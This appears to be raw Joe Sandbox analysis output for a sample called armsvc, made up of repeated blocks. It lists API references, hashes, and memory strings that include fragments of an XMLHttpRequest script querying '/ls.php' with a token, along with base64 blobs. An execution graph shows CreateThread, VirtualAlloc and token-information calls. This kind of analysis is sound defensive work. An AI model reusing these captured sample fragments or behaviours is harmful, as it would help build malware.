                                                                                                                                                          • Instruction Fuzzy Hash: 4AB09270D0A60187F3018F52A840722A7B49387213F006805540573234EE2EC5458A09
                                                                                                                                                          APIs
                                                                                                                                                          • __scrt_initialize_crt.LIBCMT ref: 02007070
                                                                                                                                                          • __scrt_acquire_startup_lock.LIBCMT ref: 02007085
                                                                                                                                                          • __scrt_release_startup_lock.LIBCMT ref: 020070F3
                                                                                                                                                          • __scrt_is_managed_app.LIBCMT ref: 0200716A
                                                                                                                                                          • __security_init_cookie.LIBCMT ref: 020071E4
                                                                                                                                                          Strings
                                                                                                                                                          • === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) , xrefs: 0200708C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__security_init_cookie
                                                                                                                                                          • String ID: === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText))
                                                                                                                                                          • API String ID: 4242105010-1101730856
                                                                                                                                                          • Opcode ID: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction ID: 4f5d561e1f98c8170dc1c642ad8afebca86f8de0884995453d1f5a159cda65b4
                                                                                                                                                          • Opcode Fuzzy Hash: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction Fuzzy Hash: 6131A42170434082FA15BB79D8D43EED3E3EB45788F4450298A4A077F6DF2DE845EB51
                                                                                                                                                          APIs
                                                                                                                                                          • __scrt_initialize_crt.LIBCMT ref: 02007070
                                                                                                                                                          • __scrt_acquire_startup_lock.LIBCMT ref: 02007085
                                                                                                                                                          • __scrt_release_startup_lock.LIBCMT ref: 020070F3
                                                                                                                                                          • __scrt_is_managed_app.LIBCMT ref: 0200716A
                                                                                                                                                          • __security_init_cookie.LIBCMT ref: 020071E4
                                                                                                                                                          Strings
                                                                                                                                                          • === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) , xrefs: 0200708C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__security_init_cookie
                                                                                                                                                          • String ID: === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText))
                                                                                                                                                          • API String ID: 4242105010-1101730856
                                                                                                                                                          • Opcode ID: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction ID: 4f5d561e1f98c8170dc1c642ad8afebca86f8de0884995453d1f5a159cda65b4
                                                                                                                                                          • Opcode Fuzzy Hash: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction Fuzzy Hash: 6131A42170434082FA15BB79D8D43EED3E3EB45788F4450298A4A077F6DF2DE845EB51
                                                                                                                                                          APIs
                                                                                                                                                          • __scrt_initialize_crt.LIBCMT ref: 02007070
                                                                                                                                                          • __scrt_acquire_startup_lock.LIBCMT ref: 02007085
                                                                                                                                                          • __scrt_release_startup_lock.LIBCMT ref: 020070F3
                                                                                                                                                          • __scrt_is_managed_app.LIBCMT ref: 0200716A
                                                                                                                                                          • __security_init_cookie.LIBCMT ref: 020071E4
                                                                                                                                                          Strings
                                                                                                                                                          • === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) , xrefs: 0200708C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__security_init_cookie
                                                                                                                                                          • String ID: === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText))
                                                                                                                                                          • API String ID: 4242105010-1101730856
                                                                                                                                                          • Opcode ID: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction ID: 4f5d561e1f98c8170dc1c642ad8afebca86f8de0884995453d1f5a159cda65b4
                                                                                                                                                          • Opcode Fuzzy Hash: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction Fuzzy Hash: 6131A42170434082FA15BB79D8D43EED3E3EB45788F4450298A4A077F6DF2DE845EB51
                                                                                                                                                          APIs
                                                                                                                                                          • __scrt_initialize_crt.LIBCMT ref: 02007070
                                                                                                                                                          • __scrt_acquire_startup_lock.LIBCMT ref: 02007085
                                                                                                                                                          • __scrt_release_startup_lock.LIBCMT ref: 020070F3
                                                                                                                                                          • __scrt_is_managed_app.LIBCMT ref: 0200716A
                                                                                                                                                          • __security_init_cookie.LIBCMT ref: 020071E4
                                                                                                                                                          Strings
                                                                                                                                                          • === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) , xrefs: 0200708C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__security_init_cookie
                                                                                                                                                          • String ID: === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText))
                                                                                                                                                          • API String ID: 4242105010-1101730856
                                                                                                                                                          • Opcode ID: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction ID: 4f5d561e1f98c8170dc1c642ad8afebca86f8de0884995453d1f5a159cda65b4
                                                                                                                                                          • Opcode Fuzzy Hash: 98a88802e028db9242f742328dc62f76af9b7f596fa2a2f7fb64fc9ab0610944
                                                                                                                                                          • Instruction Fuzzy Hash: 6131A42170434082FA15BB79D8D43EED3E3EB45788F4450298A4A077F6DF2DE845EB51
                                                                                                                                                          APIs
                                                                                                                                                          • capture_previous_context.LIBCMT ref: 02007266
                                                                                                                                                          • __raise_securityfailure.LIBCMT ref: 02007308
                                                                                                                                                          Strings
                                                                                                                                                          • console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);, xrefs: 020072C8
                                                                                                                                                          • ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww, xrefs: 020072E0
                                                                                                                                                          • NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8, xrefs: 020072F5
                                                                                                                                                          • equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex, xrefs: 0200725F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __raise_securityfailurecapture_previous_context
                                                                                                                                                          • String ID: console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);$NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8$ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww$equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex
                                                                                                                                                          • API String ID: 362098488-1112915287
                                                                                                                                                          • Opcode ID: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction ID: f2530fac6a1a6f3173f55f99bc5d94fa19cee5e4f59d4175001d45f0997b3178
                                                                                                                                                          • Opcode Fuzzy Hash: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction Fuzzy Hash: A1212574205B0095FB41DB18F899369BBA4F788344F9002AADE8E877B6EF3DD065D700
                                                                                                                                                          APIs
                                                                                                                                                          • capture_previous_context.LIBCMT ref: 02007266
                                                                                                                                                          • __raise_securityfailure.LIBCMT ref: 02007308
                                                                                                                                                          Strings
                                                                                                                                                          • ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww, xrefs: 020072E0
                                                                                                                                                          • equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex, xrefs: 0200725F
                                                                                                                                                          • console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);, xrefs: 020072C8
                                                                                                                                                          • NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8, xrefs: 020072F5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __raise_securityfailurecapture_previous_context
                                                                                                                                                          • String ID: console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);$NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8$ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww$equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex
                                                                                                                                                          • API String ID: 362098488-1112915287
                                                                                                                                                          • Opcode ID: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction ID: f2530fac6a1a6f3173f55f99bc5d94fa19cee5e4f59d4175001d45f0997b3178
                                                                                                                                                          • Opcode Fuzzy Hash: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction Fuzzy Hash: A1212574205B0095FB41DB18F899369BBA4F788344F9002AADE8E877B6EF3DD065D700
                                                                                                                                                          APIs
                                                                                                                                                          • capture_previous_context.LIBCMT ref: 02007266
                                                                                                                                                          • __raise_securityfailure.LIBCMT ref: 02007308
                                                                                                                                                          Strings
                                                                                                                                                          • ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww, xrefs: 020072E0
                                                                                                                                                          • equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex, xrefs: 0200725F
                                                                                                                                                          • console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);, xrefs: 020072C8
                                                                                                                                                          • NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8, xrefs: 020072F5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __raise_securityfailurecapture_previous_context
                                                                                                                                                          • String ID: console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);$NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8$ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww$equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex
                                                                                                                                                          • API String ID: 362098488-1112915287
                                                                                                                                                          • Opcode ID: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction ID: f2530fac6a1a6f3173f55f99bc5d94fa19cee5e4f59d4175001d45f0997b3178
                                                                                                                                                          • Opcode Fuzzy Hash: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction Fuzzy Hash: A1212574205B0095FB41DB18F899369BBA4F788344F9002AADE8E877B6EF3DD065D700
                                                                                                                                                          APIs
                                                                                                                                                          • capture_previous_context.LIBCMT ref: 02007266
                                                                                                                                                          • __raise_securityfailure.LIBCMT ref: 02007308
                                                                                                                                                          Strings
                                                                                                                                                          • console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);, xrefs: 020072C8
                                                                                                                                                          • NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8, xrefs: 020072F5
                                                                                                                                                          • ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww, xrefs: 020072E0
                                                                                                                                                          • equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex, xrefs: 0200725F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000003.2048976232.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000003.2026507361.0000000002000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_3_2000000_armsvc.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __raise_securityfailurecapture_previous_context
                                                                                                                                                          • String ID: console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true);$NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8$ZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI4fDAwMzhmNWE4ZDI3NWNjNWVkZWNkMjk2OGVlNDJjZjllZjFiZjMwZWZ8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHww$equest.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=678185ff&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '3c37e2e9061b037491ab8d2388d4d5835ad56e60');</script><script type='tex
                                                                                                                                                          • API String ID: 362098488-1112915287
                                                                                                                                                          • Opcode ID: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction ID: f2530fac6a1a6f3173f55f99bc5d94fa19cee5e4f59d4175001d45f0997b3178
                                                                                                                                                          • Opcode Fuzzy Hash: 73beaabc9a2851720d311603f92b9e2c616cb3b3a5ca12137d892118df078c35
                                                                                                                                                          • Instruction Fuzzy Hash: A1212574205B0095FB41DB18F899369BBA4F788344F9002AADE8E877B6EF3DD065D700

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:56
                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                          execution_graph 3914 ba58de 3915 bb53f0 VirtualAlloc 3914->3915 3916 ba58f9 3915->3916 3917 ba81c0 3 API calls 3916->3917 3918 ba5907 3917->3918 3862 ba5b8f 3873 bb53f0 3862->3873 3864 ba5baf 3878 ba81c0 3864->3878 3866 ba5c2c 3867 ba5c84 3884 ba5990 3867->3884 3869 ba5dcd 3869->3869 3870 ba5d56 CreateThread 3871 ba5bbc 3870->3871 3871->3866 3871->3867 3871->3870 3872 ba5cd4 CreateThread CloseHandle 3871->3872 3872->3871 3874 bb53f4 3873->3874 3875 bb545e VirtualAlloc 3874->3875 3877 bb53f6 3874->3877 3876 bb5460 3875->3876 3876->3874 3877->3864 3882 ba81e5 3878->3882 3879 ba8357 GetTokenInformation 3879->3882 3880 ba830b CloseHandle 3880->3882 3881 ba8212 GetTokenInformation 3881->3882 3882->3871 3882->3879 3882->3880 3882->3881 3883 ba81f7 3882->3883 3883->3871 3885 ba5994 wcscpy 3884->3885 3886 ba5a23 3885->3886 3887 ba5a8d VirtualAlloc 3885->3887 3886->3869 3887->3885 3919 ba5d22 3920 ba5cd4 CreateThread CloseHandle 3919->3920 3923 ba5bbc 3919->3923 3920->3923 3921 ba5c2c 3922 ba5d56 CreateThread 3922->3923 3923->3920 3923->3921 3923->3922 3924 ba5c84 3923->3924 3925 ba5990 VirtualAlloc 3924->3925 3926 ba5dcd 3925->3926 3926->3926 3908 ba81e3 3912 ba81e5 3908->3912 3909 ba8357 GetTokenInformation 3909->3912 3910 ba830b CloseHandle 3910->3912 3911 ba8212 GetTokenInformation 3911->3912 3912->3909 3912->3910 3912->3911 3913 ba81f7 3912->3913 3888 ba5d50 CreateThread 3895 ba5bbc 3888->3895 3889 ba5cd4 CreateThread CloseHandle 3889->3895 3890 ba5c84 3892 ba5990 VirtualAlloc 3890->3892 3891 ba5c2c 3893 ba5dcd 3892->3893 3893->3893 3894 ba5d56 CreateThread 3894->3895 3895->3889 3895->3890 3895->3891 3895->3894 3896 ba83e7 3899 ba81e5 3896->3899 3897 ba830b CloseHandle 3897->3899 3898 ba8212 GetTokenInformation 3898->3899 3899->3897 3899->3898 3900 ba81f7 3899->3900 3901 ba8357 GetTokenInformation 3899->3901 3901->3899

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 738 ba5346-ba5359 739 ba54cf 738->739 740 ba535f 738->740 741 ba5335 739->741 742 ba54d5 739->742 743 ba5363 740->743 744 ba5361 740->744 745 ba53ef-ba53f8 741->745 742->741 746 ba54db 742->746 747 ba54ab-ba54b9 743->747 748 ba5369-ba536d 743->748 744->743 751 ba5377 745->751 750 ba54dc-ba54dd 746->750 749 ba54bb 747->749 748->747 757 ba5373 748->757 755 ba54bd-ba54c3 749->755 756 ba54e2 749->756 753 ba5379-ba543f 751->753 754 ba531e-ba547b 751->754 760 ba53a9-ba5419 753->760 761 ba5445 753->761 768 ba5309-ba5313 754->768 769 ba5481 754->769 755->750 762 be0cf5-be0d02 756->762 757->751 760->755 766 ba541f 760->766 761->760 763 ba544b-ba544f 761->763 770 ba53a4 763->770 766->754 771 ba52f2-ba5408 768->771 772 ba5315-ba53ed 768->772 769->768 773 ba5487 769->773 776 ba538d 770->776 777 ba53a6 770->777 782 ba540e-ba5461 771->782 783 ba532f-ba5344 771->783 772->745 778 ba548e-ba549f 773->778 779 ba538f-ba53a3 776->779 780 ba53c2-ba53cb 776->780 777->776 781 ba53a7-ba53a8 777->781 778->749 779->770 780->756 785 ba53d1 780->785 781->762 782->755 787 ba5463 782->787 789 ba52fe 785->789 790 ba5471 785->790 787->783 791 ba5469 787->791 789->790 792 ba5304-ba538b 789->792 790->778 791->783 793 ba546f 791->793 792->776 793->790
